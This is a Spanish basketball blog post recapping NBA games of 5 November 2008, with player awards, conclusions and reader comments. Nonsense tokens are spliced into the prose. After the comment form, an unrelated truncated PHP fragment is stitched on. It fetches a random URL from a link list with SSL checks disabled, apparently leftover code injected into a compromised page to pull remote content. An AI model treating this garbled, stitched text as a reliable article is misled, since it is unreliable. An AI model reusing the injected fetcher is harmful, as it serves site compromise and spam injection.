La crónica (05/11/08): Noche de gigantes

06 de November de 2008 por MagicJohnson32

tpwolves

Por TheDeerHunter & MagicJohnson32

¿Recuerdan el 22 de enero de 2006? Sí, por supuesto que lo recuerdan. Fue la noche en que Suns y Sonics sumaron 301 puntos y Kobe Bryant le hizo 81 a los Raptors. Pues desde aquella noche no se recuerda una combinación de actuaciones tan portentosas y estadísticas tan extraordinarias como las vistas ayer.

Stoudemire en la victoria fácil de Suns sobre Pacers, Parker en la victoria apurada de Spurs sobre Timberwolves, y LeBron en el triunfo ante los Bulls se llevan todos los titulares. Sus estadísticas las detallaremos en el apartados de los premios del día.

Al margen de las 3 actuaciones más sobrehumanas de la temporada, destacan también sorpresas muy importantes en la zona alta:

– Victoria de los Hawks contra Hornets, con lo bien que iban y justamente cuando habían recuperado a Stojakovic & Chandler. La buena defensa de los pájaros fue clave.

Miami sorprendió a Philadelphia, con un gran Wade y buen papel de todo el equipo. Ya tiene mérito equilibrar ambos juegos interiores.

– Tayshaun Prince asumió los requerimientos anotadores que le pedía su técnico y se marcó un 10/13 (27 puntos) para terminar con la imbatibilidad de los Raptors. Iverson no debutó.

En la zona baja hay que destacar las victorias de Knicks sobre Bobcats con un excelente Zach Randolph (tenía que ser Randolph) y la primera victoria de los Kings sobre Grizzlies. Además, ganaron Celtics y Lakers sin excesivos problemas (a Thunder y Clippers respectivamente), Portland volvió a perder contra uno de los buenos (los Jazz), los Warriors superaron a los Nuggets (todavía sin las nuevas incorporaciones) y los Bucks a los Wizards.amaresmile

Los españoles, tirando a regulares. Calderón estuvo excelente y Rudy, bien, aunque perdieron ambos. Los hermanos Gasol, flojetes, y Sergio sólo jugó 7 minutos en los que apenas hizo nada.

Vamos con nuestros premios:

MVP: ¿Qué debe de haber hecho un jugador para merecer el premio más que LeBron James y sus 41 puntos, 9 rebotes, 6 asistencias y 4 robos? Lo más extraordinario es que han sido dos los jugadores que han brillado por encima de James: Amare Stoudemire (49 puntos, 11 rebotes, 6 asistencias, 5 robos y 2 tapones, con 65 de eficiencia) y Tony Parker (22 de 36 en tiros de campo y 9 de 10 en tiros libres para un total de 55 puntos, incluyendo el buzzer-beater para forzar la segunda prórroga, más 10 asistencias y 7 rebotes). La gigantesca actuación del base francés cuenta además con el plus de haber permitido a los Spurs sumar su primera victoria de la temporada. El completísimo partido de Wade queda eclipsado ante semejantes exhibiciones.

El Rookie: Kevin Love (14 puntos, 9 rebotes, 3 tapones), Westbrook (13 puntos y 4 rebotes), Augustin (14 puntos, 4 rebotes y 4 asistencias), Rudy (14 puntos, 3 rebotes y 3 asistencias),  Thompson (11 puntos y 6 rebotes) y Michael Beasley (17 puntos, 9 rebotes) destacaron, aunque atención a los 6 puntos, 6 asistencias, 4 rebotes y ¡9 recuperaciones! de Mario Chalmers. Las mejores actuaciones de debutantes, sin embargo, fueron a cargo de OJ Mayo,  con 28 puntos, y del segunda ronda de los Bucks Mbah a Moute, autor de 17 puntos con 8 de 10 en tiros de campo y 6 rebotes.

La sorpresa: Roger Mason y Kelenna Azubuike se confirman como tercera opción más que válidas en sus respectivos equipos. Más sorprendente si cabe es asistir a la resurrección de Ridnour, precisamente con Redd ausente por lesión, y compartiendo muchos minutos y protagonismo con Ramon Sessions: entre ambos, 42 puntos, 19 asistencias y 10 rebotes en la victoria en la prórroga de los Bucks frente a los Wizards. Y casi más sorprendente es que Brandan Wright logre su máxima anotación como profesional, 18 puntos con 7 de 9 en tiros, además de 13 rebotes y 3 tapones.

La decepción: Anoche asistimos a un nuevo ejemplo del mal inicio de temporada de Andre Iguodala. Se quedó en 2 míseros puntos y sus estadísticas más abultadas fueron los 6 tiros fallados de 7 intentos y los 4 balones perdidos. Quentin Richardson, con 1 de 9 en tiros y 6 pérdidas de balón, no se quedó atrás.

El mayor esfuerzo en vano: Ben Gordon tuvo uno de sus noches buenas y anotó 31 puntos con 11 de 19 en tiros en la derrota de los Bulls frente a los Cavs. Al Jefferson, por su parte, vio como Parker echaba al traste sus 30 puntos y 14 rebotes, y Calderón y Bosh no fueron suficiente para que los Raptors ganasen a los Pistons.

Éstas son las conclusiones que sacamos de los partidos jugados anoche:abynumblock

– Quedan dos equipos con el casillero de victorias a 0: Wizards y Clippers. Los capitalinos tienen la excusa de la lesión de Arenas, pero los de Dunleavy tiene verdadera mala pinta: han perdido sus 5 partidos por una media de 20,8 puntos. Les damos de margen hasta ver a Baron Davis y Marcus Camby en condiciones.

– ¿Será cierto eso de que los Lakers han trabajado la defensa en pretemporada? Anoche volvieron a dar prueba de ello al dejar sin anotar un solo punto durante más de 7 minutos del último cuarto a los Clippers, cuando éstos mandaban en el marcador 81-79. Tras cuatro victorias en cuatro partidos, la media de puntos encajados por los Lakers es de 85 por partido, la segunda mejor de la liga.

– Una victoria puede ser signo de debilidad: si necesitas la mejor actuación en la vida de Tony Parker, un partido brillante de Duncan, y a un Roger Mason inspiradísimo para ganar en dos prórrogas a los Wolves, es que andas muy, muy, muy justo.

– Los Jazz, sin Deron Williams, ya se han puesto 4-0. Y Kirilenko ya se ha situado en cabeza del premio al mejor 6º hombre. Parece que al fin ha encontrado su sitio en los esquemas de Sloan, aunque esperaremos a que regrese Deron para acabar de creérnoslo.

– Mucha atención a los Hawks, que siguen coleccionado victorias de mérito. Anoche, ni más ni menos que en New Orleans con otra gran actuación de un Joe Johnson que tal vez este año sí haga méritos de sobra para ir al All Star Game.

Carmelo dijo que quería anotar 44 puntos ante Golden State en homenaje a Barack Obama, el 44º presidente de los Estados Unidos. ¿Se veía venir o no, la derrota de los Nuggets frente a los Warriors?

Veamos un resumen del espectacular Spurs-Wolves:

Comenta

4 comentarios a esta entrada

  1. Pow_Brolin dice:
    #1

    Señor cronista continua rajando de Zach que al animalito le gustan mucho tus opiniones ¬_¬

      Citar

  2. Jabho dice:
    #2

    Gran trabajo si señor.

    Coincido especialmente con la concluisñon de los Spurs. Victoria muy significativa. Porque si juegas mal y pierdes pues eso, pero si ganas a uno equipo flojete a base de estas actuaciones…. Por primera vez se les ve muy, muy solos a Duncan y Parker

      Citar

  3. telekoman dice:
    #3

    La pregunta inevitable después de la actuación de Parker es ¿Quién es mejor, Parker o Jasikevicius? Jeje

    Sí, la verdad es que pocas veces se les ha visto tan solos a estos dos elementos. También es de destacar las 4 consecutivas de Lakers, Jazz y Pistons. Sobre todo las de estos últimos con la baja de Billups.

      Citar

  4. Txusma dice:
    #4

    Recordemos que los Jazz llevan 4 seguidas sin Deron Williams… Kirilenko otro al q se le ve comodo como 6º hombre.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>